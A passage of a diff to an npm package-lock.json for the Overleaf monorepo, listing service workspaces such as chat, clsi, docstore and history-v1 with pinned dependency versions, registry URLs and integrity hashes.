"^2.88.2", + "sequelize": "^6.31.0", + "yargs": "^17.0.0" + }, + "devDependencies": { + "@pollyjs/adapter-node-http": "^6.0.6", + "@pollyjs/core": "^6.0.6", + "@pollyjs/persister-fs": "^6.0.6", + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "sequelize-cli": "^6.6.0", + "sinon": "^9.2.4", + "sinon-chai": "^3.7.0", + "typescript": "^5.0.4" + } + }, + "services/analytics/node_modules/p-limit": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", + "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", + "dependencies": { + "p-try": "^2.0.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "services/chat": { + "name": "@overleaf/chat", + "version": "1.0.0", + "license": "AGPL-3.0", + "dependencies": { + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/settings": "*", + "async": "^3.2.5", + "body-parser": "^1.20.3", + "exegesis-express": "^4.0.0", + "express": "^4.21.2", + "mongodb": "6.12.0" + }, + "devDependencies": { + "acorn": "^7.1.1", + "ajv": "^6.12.0", + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "request": "^2.88.2", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "timekeeper": "^2.2.0", + "typescript": "^5.0.4" + } + }, + "services/clsi": { + "name": "@overleaf/clsi", + "dependencies": { + "@overleaf/fetch-utils": "*", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/promise-utils": "*", + "@overleaf/settings": "*", + "archiver": "5.3.2", + "async": "^3.2.5", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "dockerode": "^4.0.5", + "express": "^4.21.2", + "lodash": "^4.17.21", + "p-limit": "^3.1.0", + "request": "^2.88.2", + "send": "^0.19.0", + "tar-fs": "^3.0.4", + "workerpool": "^6.1.5" + }, + "devDependencies": { + "@types/workerpool": "^6.1.0", + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "mock-fs": "^5.1.2", + "node-fetch": "^2.7.0", + "sandboxed-module": "^2.0.4", + "sinon": "~9.0.1", + "sinon-chai": "^3.7.0", + "timekeeper": "2.2.0", + "typescript": "^5.0.4" + } + }, + "services/clsi-cache": { + "name": "@overleaf/clsi-cache", + "dependencies": { + "@overleaf/fetch-utils": "*", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/promise-utils": "*", + "@overleaf/settings": "*", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "celebrate": "^15.0.3", + "express": "^4.21.2" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0" + } + }, + "services/clsi-perf": { + "name": "@overleaf/clsi-perf", + "dependencies": { + "@google-cloud/bigquery": "^5.6.0", + "@overleaf/fetch-utils": "*", + "@overleaf/logger": "*", + "@overleaf/o-error": "*", + "@overleaf/settings": "*", + "bunyan": "^1.8.15", + "cookie": "^0.4.1", + "express": "^4.21.2", + "glob": "^7.2.0", + "p-limit": "^3.1.0" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "typescript": "^5.0.4" + } + }, + "services/clsi-perf/node_modules/cookie": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/cookie/-/cookie-0.4.1.tgz", + "integrity": "sha512-ZwrFkGJxUR3EIoXtO+yVE69Eb7KlixbaeAWfBQB9vVsNn/o+Yw69gBWSSDK825hQNdN+wF8zELf3dFNl/kxkUA==", + "engines": { + "node": ">= 0.6" + } + }, + "services/clsi/node_modules/@grpc/grpc-js": { + "version": "1.13.2", + "resolved": "https://registry.npmjs.org/@grpc/grpc-js/-/grpc-js-1.13.2.tgz", + "integrity": "sha512-nnR5nmL6lxF8YBqb6gWvEgLdLh/Fn+kvAdX5hUOnt48sNSb0riz/93ASd2E5gvanPA41X6Yp25bIfGRp1SMb2g==", + "license": "Apache-2.0", + "dependencies": { + "@grpc/proto-loader": "^0.7.13", + "@js-sdsl/ordered-map": "^4.4.2" + }, + "engines": { + "node": ">=12.10.0" + } + }, + "services/clsi/node_modules/cpu-features": { + "version": "0.0.10", + "resolved": "https://registry.npmjs.org/cpu-features/-/cpu-features-0.0.10.tgz", + "integrity": "sha512-9IkYqtX3YHPCzoVg1Py+o9057a3i0fp7S530UWokCSaFVTc7CwXPRiOjRjBQQ18ZCNafx78YfnG+HALxtVmOGA==", + "hasInstallScript": true, + "optional": true, + "dependencies": { + "buildcheck": "~0.0.6", + "nan": "^2.19.0" + }, + "engines": { + "node": ">=10.0.0" + } + }, + "services/clsi/node_modules/diff": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/diff/-/diff-4.0.2.tgz", + "integrity": "sha512-58lmxKSA4BNyLz+HHMUzlOEpg09FV+ev6ZMe3vJihgdxzgcwZ8VoEEPmALCZG9LmqfVoNMMKpttIYTVG6uDY7A==", + "dev": true, + "engines": { + "node": ">=0.3.1" + } + }, + "services/clsi/node_modules/docker-modem": { + "version": "5.0.6", + "resolved": "https://registry.npmjs.org/docker-modem/-/docker-modem-5.0.6.tgz", + "integrity": "sha512-ens7BiayssQz/uAxGzH8zGXCtiV24rRWXdjNha5V4zSOcxmAZsfGVm/PPFbwQdqEkDnhG+SyR9E3zSHUbOKXBQ==", + "license": "Apache-2.0", + "dependencies": { + "debug": "^4.1.1", + "readable-stream": "^3.5.0", + "split-ca": "^1.0.1", + "ssh2": "^1.15.0" + }, + "engines": { + "node": ">= 8.0" + } + }, + "services/clsi/node_modules/dockerode": { + "version": "4.0.5", + "resolved": "https://registry.npmjs.org/dockerode/-/dockerode-4.0.5.tgz", + "integrity": "sha512-ZPmKSr1k1571Mrh7oIBS/j0AqAccoecY2yH420ni5j1KyNMgnoTh4Nu4FWunh0HZIJmRSmSysJjBIpa/zyWUEA==", + "license": "Apache-2.0", + "dependencies": { + "@balena/dockerignore": "^1.0.2", + "@grpc/grpc-js": "^1.11.1", + "@grpc/proto-loader": "^0.7.13", + "docker-modem": "^5.0.6", + "protobufjs": "^7.3.2", + "tar-fs": "~2.1.2", + "uuid": "^10.0.0" + }, + "engines": { + "node": ">= 8.0" + } + }, + "services/clsi/node_modules/dockerode/node_modules/tar-fs": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/tar-fs/-/tar-fs-2.1.2.tgz", + "integrity": "sha512-EsaAXwxmx8UB7FRKqeozqEPop69DXcmYwTQwXvyAPF352HJsPdkVhvTaDPYqfNgruveJIJy3TA2l+2zj8LJIJA==", + "license": "MIT", + "dependencies": { + "chownr": "^1.1.1", + "mkdirp-classic": "^0.5.2", + "pump": "^3.0.0", + "tar-stream": "^2.1.4" + } + }, + "services/clsi/node_modules/protobufjs": { + "version": "7.4.0", + "resolved": "https://registry.npmjs.org/protobufjs/-/protobufjs-7.4.0.tgz", + "integrity": "sha512-mRUWCc3KUU4w1jU8sGxICXH/gNS94DvI1gxqDvBzhj1JpcsimQkYiOJfwsPUykUI5ZaspFbSgmBLER8IrQ3tqw==", + "hasInstallScript": true, + "license": "BSD-3-Clause", + "dependencies": { + "@protobufjs/aspromise": "^1.1.2", + "@protobufjs/base64": "^1.1.2", + "@protobufjs/codegen": "^2.0.4", + "@protobufjs/eventemitter": "^1.1.0", + "@protobufjs/fetch": "^1.1.0", + "@protobufjs/float": "^1.0.2", + "@protobufjs/inquire": "^1.1.0", + "@protobufjs/path": "^1.1.2", + "@protobufjs/pool": "^1.1.0", + "@protobufjs/utf8": "^1.1.0", + "@types/node": ">=13.7.0", + "long": "^5.0.0" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "services/clsi/node_modules/sinon": { + "version": "9.0.3", + "resolved": "https://registry.npmjs.org/sinon/-/sinon-9.0.3.tgz", + "integrity": "sha512-IKo9MIM111+smz9JGwLmw5U1075n1YXeAq8YeSFlndCLhAL5KGn6bLgu7b/4AYHTV/LcEMcRm2wU2YiL55/6Pg==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^1.7.2", + "@sinonjs/fake-timers": "^6.0.1", + "@sinonjs/formatio": "^5.0.1", + "@sinonjs/samsam": "^5.1.0", + "diff": "^4.0.2", + "nise": "^4.0.4", + "supports-color": "^7.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/sinon" + } + }, + "services/clsi/node_modules/ssh2": { + "version": "1.16.0", + "resolved": "https://registry.npmjs.org/ssh2/-/ssh2-1.16.0.tgz", + "integrity": "sha512-r1X4KsBGedJqo7h8F5c4Ybpcr5RjyP+aWIG007uBPRjmdQWfEiVLzSK71Zji1B9sKxwaCvD8y8cwSkYrlLiRRg==", + "hasInstallScript": true, + "dependencies": { + "asn1": "^0.2.6", + "bcrypt-pbkdf": "^1.0.2" + }, + "engines": { + "node": ">=10.16.0" + }, + "optionalDependencies": { + "cpu-features": "~0.0.10", + "nan": "^2.20.0" + } + }, + "services/clsi/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "services/clsi/node_modules/uuid": { + "version": "10.0.0", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-10.0.0.tgz", + "integrity": "sha512-8XkAphELsDnEGrDxUOHB3RGvXz6TeuYSGEZBOjtTtPm2lwhGBjLgOzLHB63IUWfBpNucQjND6d3AOudO+H3RWQ==", + "funding": [ + "https://github.com/sponsors/broofa", + "https://github.com/sponsors/ctavan" + ], + "license": "MIT", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "services/contacts": { + "name": "@overleaf/contacts", + "dependencies": { + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/settings": "*", + "async": "^3.2.5", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "express": "^4.21.2", + "mongodb": "6.12.0", + "request": "~2.88.2", + "underscore": "~1.13.1" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "esmock": "^2.6.3", + "mocha": "^11.1.0", + "sinon": "~9.0.1", + "sinon-chai": "^3.7.0", + "typescript": "^5.0.4" + } + }, + "services/contacts/node_modules/diff": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/diff/-/diff-4.0.2.tgz", + "integrity": "sha512-58lmxKSA4BNyLz+HHMUzlOEpg09FV+ev6ZMe3vJihgdxzgcwZ8VoEEPmALCZG9LmqfVoNMMKpttIYTVG6uDY7A==", + "dev": true, + "engines": { + "node": ">=0.3.1" + } + }, + "services/contacts/node_modules/sinon": { + "version": "9.0.3", + "resolved": "https://registry.npmjs.org/sinon/-/sinon-9.0.3.tgz", + "integrity": "sha512-IKo9MIM111+smz9JGwLmw5U1075n1YXeAq8YeSFlndCLhAL5KGn6bLgu7b/4AYHTV/LcEMcRm2wU2YiL55/6Pg==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^1.7.2", + "@sinonjs/fake-timers": "^6.0.1", + "@sinonjs/formatio": "^5.0.1", + "@sinonjs/samsam": "^5.1.0", + "diff": "^4.0.2", + "nise": "^4.0.4", + "supports-color": "^7.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/sinon" + } + }, + "services/contacts/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "services/docstore": { + "name": "@overleaf/docstore", + "dependencies": { + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/object-persistor": "*", + "@overleaf/promise-utils": "*", + "@overleaf/settings": "*", + "@overleaf/stream-utils": "^0.1.0", + "async": "^3.2.5", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "celebrate": "^15.0.3", + "express": "^4.21.2", + "lodash": "^4.17.21", + "mongodb-legacy": "6.1.3", + "p-map": "^4.0.0", + "request": "^2.88.2" + }, + "devDependencies": { + "@google-cloud/storage": "^6.10.1", + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "sandboxed-module": "~2.0.4", + "sinon": "~9.0.2", + "sinon-chai": "^3.7.0", + "typescript": "^5.0.4" + } + }, + "services/docstore/node_modules/diff": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/diff/-/diff-4.0.2.tgz", + "integrity": "sha512-58lmxKSA4BNyLz+HHMUzlOEpg09FV+ev6ZMe3vJihgdxzgcwZ8VoEEPmALCZG9LmqfVoNMMKpttIYTVG6uDY7A==", + "dev": true, + "engines": { + "node": ">=0.3.1" + } + }, + "services/docstore/node_modules/sinon": { + "version": "9.0.3", + "resolved": "https://registry.npmjs.org/sinon/-/sinon-9.0.3.tgz", + "integrity": "sha512-IKo9MIM111+smz9JGwLmw5U1075n1YXeAq8YeSFlndCLhAL5KGn6bLgu7b/4AYHTV/LcEMcRm2wU2YiL55/6Pg==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^1.7.2", + "@sinonjs/fake-timers": "^6.0.1", + "@sinonjs/formatio": "^5.0.1", + "@sinonjs/samsam": "^5.1.0", + "diff": "^4.0.2", + "nise": "^4.0.4", + "supports-color": "^7.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/sinon" + } + }, + "services/docstore/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "services/document-updater": { + "name": "@overleaf/document-updater", + "dependencies": { + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/promise-utils": "*", + "@overleaf/ranges-tracker": "*", + "@overleaf/redis-wrapper": "*", + "@overleaf/settings": "*", + "@types/chai-as-promised": "^7.1.8", + "async": "^3.2.5", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "diff-match-patch": "overleaf/diff-match-patch#89805f9c671a77a263fc53461acd62aa7498f688", + "express": "^4.21.2", + "lodash": "^4.17.21", + "minimist": "^1.2.8", + "mongodb-legacy": "6.1.3", + "request": "^2.88.2", + "requestretry": "^7.1.0" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "cluster-key-slot": "^1.0.5", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "sinon-chai": "^3.7.0", + "timekeeper": "^2.0.0", + "typescript": "^5.0.4" + } + }, + "services/filestore": { + "name": "@overleaf/filestore", + "dependencies": { + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/object-persistor": "*", + "@overleaf/settings": "*", + "@overleaf/stream-utils": "^0.1.0", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "express": "^4.21.2", + "glob": "^7.1.6", + "lodash.once": "^4.1.1", + "node-fetch": "^2.7.0", + "range-parser": "^1.2.1", + "tiny-async-pool": "^1.1.0" + }, + "devDependencies": { + "@google-cloud/storage": "^6.10.1", + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "mongodb": "6.12.0", + "sandboxed-module": "2.0.4", + "sinon": "9.0.2", + "sinon-chai": "^3.7.0", + "streamifier": "^0.1.1", + "typescript": "^5.0.4" + } + }, + "services/filestore/node_modules/diff": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/diff/-/diff-4.0.2.tgz", + "integrity": "sha512-58lmxKSA4BNyLz+HHMUzlOEpg09FV+ev6ZMe3vJihgdxzgcwZ8VoEEPmALCZG9LmqfVoNMMKpttIYTVG6uDY7A==", + "dev": true, + "engines": { + "node": ">=0.3.1" + } + }, + "services/filestore/node_modules/sinon": { + "version": "9.0.2", + "resolved": "https://registry.npmjs.org/sinon/-/sinon-9.0.2.tgz", + "integrity": "sha512-0uF8Q/QHkizNUmbK3LRFqx5cpTttEVXudywY9Uwzy8bTfZUhljZ7ARzSxnRHWYWtVTeh4Cw+tTb3iU21FQVO9A==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^1.7.2", + "@sinonjs/fake-timers": "^6.0.1", + "@sinonjs/formatio": "^5.0.1", + "@sinonjs/samsam": "^5.0.3", + "diff": "^4.0.2", + "nise": "^4.0.1", + "supports-color": "^7.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/sinon" + } + }, + "services/filestore/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "services/freegeoip": { + "version": "1.0.0", + "license": "ISC", + "dependencies": { + "@maxmind/geoip2-node": "^5.0.0", + "@overleaf/fetch-utils": "*", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "express": "^4.21.2", + "is-valid-hostname": "^1.0.2", + "tar-stream": "^2.2.0", + "zlib": "^1.0.5" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "typescript": "^5.0.4" + } + }, + "services/github-sync": { + "name": "@overleaf/github-sync", + "dependencies": { + "@octokit/request": "^9.2.2", + "@overleaf/access-token-encryptor": "*", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/mongo-utils": "*", + "@overleaf/o-error": "*", + "@overleaf/promise-utils": "*", + "@overleaf/settings": "*", + "async": "^3.2.5", + "base64-stream": "^0.1.2", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "express": "^4.21.2", + "lodash": "^4.17.21", + "mongodb-legacy": "6.1.3", + "octonode": "^0.9.5", + "p-limit": "^2.2.0", + "randomstring": "^1.1.5", + "request": "^2.88.2" + }, + "devDependencies": { + "@overleaf/fetch-utils": "*", + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "sinon-chai": "^3.7.0", + "timekeeper": "2.2.0", + "typescript": "^5.0.4" + } + }, + "services/github-sync/node_modules/@octokit/endpoint": { + "version": "10.1.3", + "resolved": "https://registry.npmjs.org/@octokit/endpoint/-/endpoint-10.1.3.tgz", + "integrity": "sha512-nBRBMpKPhQUxCsQQeW+rCJ/OPSMcj3g0nfHn01zGYZXuNDvvXudF/TYY6APj5THlurerpFN4a/dQAIAaM6BYhA==", + "license": "MIT", + "dependencies": { + "@octokit/types": "^13.6.2", + "universal-user-agent": "^7.0.2" + }, + "engines": { + "node": ">= 18" + } + }, + "services/github-sync/node_modules/@octokit/openapi-types": { + "version": "23.0.1", + "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-23.0.1.tgz", + "integrity": "sha512-izFjMJ1sir0jn0ldEKhZ7xegCTj/ObmEDlEfpFrx4k/JyZSMRHbO3/rBwgE7f3m2DHt+RrNGIVw4wSmwnm3t/g==", + "license": "MIT" + }, + "services/github-sync/node_modules/@octokit/request": { + "version": "9.2.2", + "resolved": "https://registry.npmjs.org/@octokit/request/-/request-9.2.2.tgz", + "integrity": "sha512-dZl0ZHx6gOQGcffgm1/Sf6JfEpmh34v3Af2Uci02vzUYz6qEN6zepoRtmybWXIGXFIK8K9ylE3b+duCWqhArtg==", + "license": "MIT", + "dependencies": { + "@octokit/endpoint": "^10.1.3", + "@octokit/request-error": "^6.1.7", + "@octokit/types": "^13.6.2", + "fast-content-type-parse": "^2.0.0", + "universal-user-agent": "^7.0.2" + }, + "engines": { + "node": ">= 18" + } + }, + "services/github-sync/node_modules/@octokit/request-error": { + "version": "6.1.7", + "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-6.1.7.tgz", + "integrity": "sha512-69NIppAwaauwZv6aOzb+VVLwt+0havz9GT5YplkeJv7fG7a40qpLt/yZKyiDxAhgz0EtgNdNcb96Z0u+Zyuy2g==", + "license": "MIT", + "dependencies": { + "@octokit/types": "^13.6.2" + }, + "engines": { + "node": ">= 18" + } + }, + "services/github-sync/node_modules/@octokit/types": { + "version": "13.8.0", + "resolved": "https://registry.npmjs.org/@octokit/types/-/types-13.8.0.tgz", + "integrity": "sha512-x7DjTIbEpEWXK99DMd01QfWy0hd5h4EN+Q7shkdKds3otGQP+oWE/y0A76i1OvH9fygo4ddvNf7ZvF0t78P98A==", + "license": "MIT", + "dependencies": { + "@octokit/openapi-types": "^23.0.1" + } + }, + "services/github-sync/node_modules/p-limit": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", + "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", + "dependencies": { + "p-try": "^2.0.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "services/github-sync/node_modules/universal-user-agent": { + "version": "7.0.2", + "resolved": "https://registry.npmjs.org/universal-user-agent/-/universal-user-agent-7.0.2.tgz", + "integrity": "sha512-0JCqzSKnStlRRQfCdowvqy3cy0Dvtlb8xecj/H8JFZuCze4rwjPZQOgvFvn0Ws/usCHQFGpyr+pB9adaGwXn4Q==", + "license": "ISC" + }, + "services/history-v1": { + "name": "overleaf-editor", + "version": "1.0.0", + "license": "Proprietary", + "dependencies": { + "@google-cloud/secret-manager": "^5.6.0", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/mongo-utils": "*", + "@overleaf/o-error": "*", + "@overleaf/object-persistor": "*", + "@overleaf/promise-utils": "*", + "@overleaf/redis-wrapper": "*", + "@overleaf/settings": "*", + "@overleaf/stream-utils": "^0.1.0", + "archiver": "^5.3.0", + "basic-auth": "^2.0.1", + "bluebird": "^3.7.2", + "body-parser": "^1.20.3", + "bull": "^4.16.5", + "bunyan": "^1.8.12", + "check-types": "^11.1.2", + "command-line-args": "^3.0.3", + "config": "^1.19.0", + "express": "^4.21.2", + "fs-extra": "^9.0.1", + "generic-pool": "^2.1.1", + "helmet": "^3.22.0", + "http-status": "^1.4.2", + "jsonwebtoken": "^9.0.0", + "knex": "^2.4.0", + "lodash": "^4.17.19", + "mongodb": "6.12.0", + "overleaf-editor-core": "*", + "p-limit": "^6.2.0", + "pg": "^8.7.1", + "pg-query-stream": "^4.2.4", + "swagger-tools": "^0.10.4", + "temp": "^0.8.3", + "throng": "^4.0.0", + "tsscmp": "^1.0.6", + "utf-8-validate": "^5.0.4" + }, + "devDependencies": { + "benny": "^3.7.1", + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "chai-exclude": "^2.1.1", + "mocha": "^11.1.0", + "node-fetch": "^2.7.0", + "sinon": "^9.0.2", + "swagger-client": "^3.10.0", + "typescript": "^5.0.4", + "yauzl": "^2.9.1" + } + }, + "services/history-v1/node_modules/array-back": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/array-back/-/array-back-1.0.4.tgz", + "integrity": "sha1-ZEun8JX3/898Q7Xw3DnTwfA8Bjs=", + "dependencies": { + "typical": "^2.6.0" + }, + "engines": { + "node": ">=0.12.0" + } + }, + "services/history-v1/node_modules/bull": { + "version": "4.16.5", + "resolved": "https://registry.npmjs.org/bull/-/bull-4.16.5.tgz", + "integrity": "sha512-lDsx2BzkKe7gkCYiT5Acj02DpTwDznl/VNN7Psn7M3USPG7Vs/BaClZJJTAG+ufAR9++N1/NiUTdaFBWDIl5TQ==", + "license": "MIT", + "dependencies": { + "cron-parser": "^4.9.0", + "get-port": "^5.1.1", + "ioredis": "^5.3.2", + "lodash": "^4.17.21", + "msgpackr": "^1.11.2", + "semver": "^7.5.2", + "uuid": "^8.3.0" + }, + "engines": { + "node": ">=12" + } + }, + "services/history-v1/node_modules/chai-exclude": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/chai-exclude/-/chai-exclude-2.1.1.tgz", + "integrity": "sha512-IHgNmgAFOkyRPnmOtZio9UsOHQ6RnzVr2LOs+5V9urYYqjhV/ERLQapC0Eq2DmID5eDWyngAcBxNUm0ZK0QbrQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "fclone": "^1.0.11" + }, + "peerDependencies": { + "chai": ">= 4.0.0 < 5" + } + }, + "services/history-v1/node_modules/check-types": { + "version": "11.1.2", + "resolved": "https://registry.npmjs.org/check-types/-/check-types-11.1.2.tgz", + "integrity": "sha512-tzWzvgePgLORb9/3a0YenggReLKAIb2owL03H2Xdoe5pKcUyWRSEQ8xfCar8t2SIAuEDwtmx2da1YB52YuHQMQ==" + }, + "services/history-v1/node_modules/command-line-args": { + "version": "3.0.5", + "resolved": "https://registry.npmjs.org/command-line-args/-/command-line-args-3.0.5.tgz", + "integrity": "sha1-W9StReeYPlwTRJGOQCgO4mk8WsA=", + "dependencies": { + "array-back": "^1.0.4", + "feature-detect-es6": "^1.3.1", + "find-replace": "^1.0.2", + "typical": "^2.6.0" + }, + "bin": { + "command-line-args": "bin.js" + } + }, + "services/history-v1/node_modules/cron-parser": { + "version": "4.9.0", + "resolved": "https://registry.npmjs.org/cron-parser/-/cron-parser-4.9.0.tgz", + "integrity": "sha512-p0SaNjrHOnQeR8/VnfGbmg9te2kfyYSQ7Sc/j/6DtPL3JQvKxmjO9TSjNFpujqV3vEYYBvNNvXSxzyksBWAx1Q==", + "license": "MIT", + "dependencies": { + "luxon": "^3.2.1" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "services/history-v1/node_modules/debug": { + "version": "4.4.0", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.0.tgz", + "integrity": "sha512-6WTZ/IxCY/T6BALoZHaE4ctp9xm+Z5kY/pzYaCHRFeyVhojxlrm+46y68HA6hr0TcwEssoxNiDEUJQjfPZ/RYA==", + "license": "MIT", + "dependencies": { + "ms": "^2.1.3" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "services/history-v1/node_modules/denque": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/denque/-/denque-2.1.0.tgz", + "integrity": "sha512-HVQE3AAb/pxF8fQAoiqpvg9i3evqug3hoiwakOyZAwJm+6vZehbkYXZ0l4JxS+I3QxM97v5aaRNhj8v5oBhekw==", + "license": "Apache-2.0", + "engines": { + "node": ">=0.10" + } + }, + "services/history-v1/node_modules/find-replace": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/find-replace/-/find-replace-1.0.3.tgz", + "integrity": "sha1-uI5zZNLZyVlVnziMZmcNYTBEH6A=", + "dependencies": { + "array-back": "^1.0.4", + "test-value": "^2.1.0" + }, + "engines": { + "node": ">=4.0.0" + } + }, + "services/history-v1/node_modules/fs-extra": { + "version": "9.1.0", + "resolved": "https://registry.npmjs.org/fs-extra/-/fs-extra-9.1.0.tgz", + "integrity": "sha512-hcg3ZmepS30/7BSFqRvoo3DOMQu7IjqxO5nCDt+zM9XWjb33Wg7ziNT+Qvqbuc3+gWpzO02JubVyk2G4Zvo1OQ==", + "dependencies": { + "at-least-node": "^1.0.0", + "graceful-fs": "^4.2.0", + "jsonfile": "^6.0.1", + "universalify": "^2.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "services/history-v1/node_modules/ioredis": { + "version": "5.5.0", + "resolved": "https://registry.npmjs.org/ioredis/-/ioredis-5.5.0.tgz", + "integrity": "sha512-7CutT89g23FfSa8MDoIFs2GYYa0PaNiW/OrT+nRyjRXHDZd17HmIgy+reOQ/yhh72NznNjGuS8kbCAcA4Ro4mw==", + "license": "MIT", + "dependencies": { + "@ioredis/commands": "^1.1.1", + "cluster-key-slot": "^1.1.0", + "debug": "^4.3.4", + "denque": "^2.1.0", + "lodash.defaults": "^4.2.0", + "lodash.isarguments": "^3.1.0", + "redis-errors": "^1.2.0", + "redis-parser": "^3.0.0", + "standard-as-callback": "^2.1.0" + }, + "engines": { + "node": ">=12.22.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/ioredis" + } + }, + "services/history-v1/node_modules/p-limit": { + "version": "6.2.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-6.2.0.tgz", + "integrity": "sha512-kuUqqHNUqoIWp/c467RI4X6mmyuojY5jGutNU0wVTmEOOfcuwLqyMVoAi9MKi2Ak+5i9+nhmrK4ufZE8069kHA==", + "license": "MIT", + "dependencies": { + "yocto-queue": "^1.1.1" + 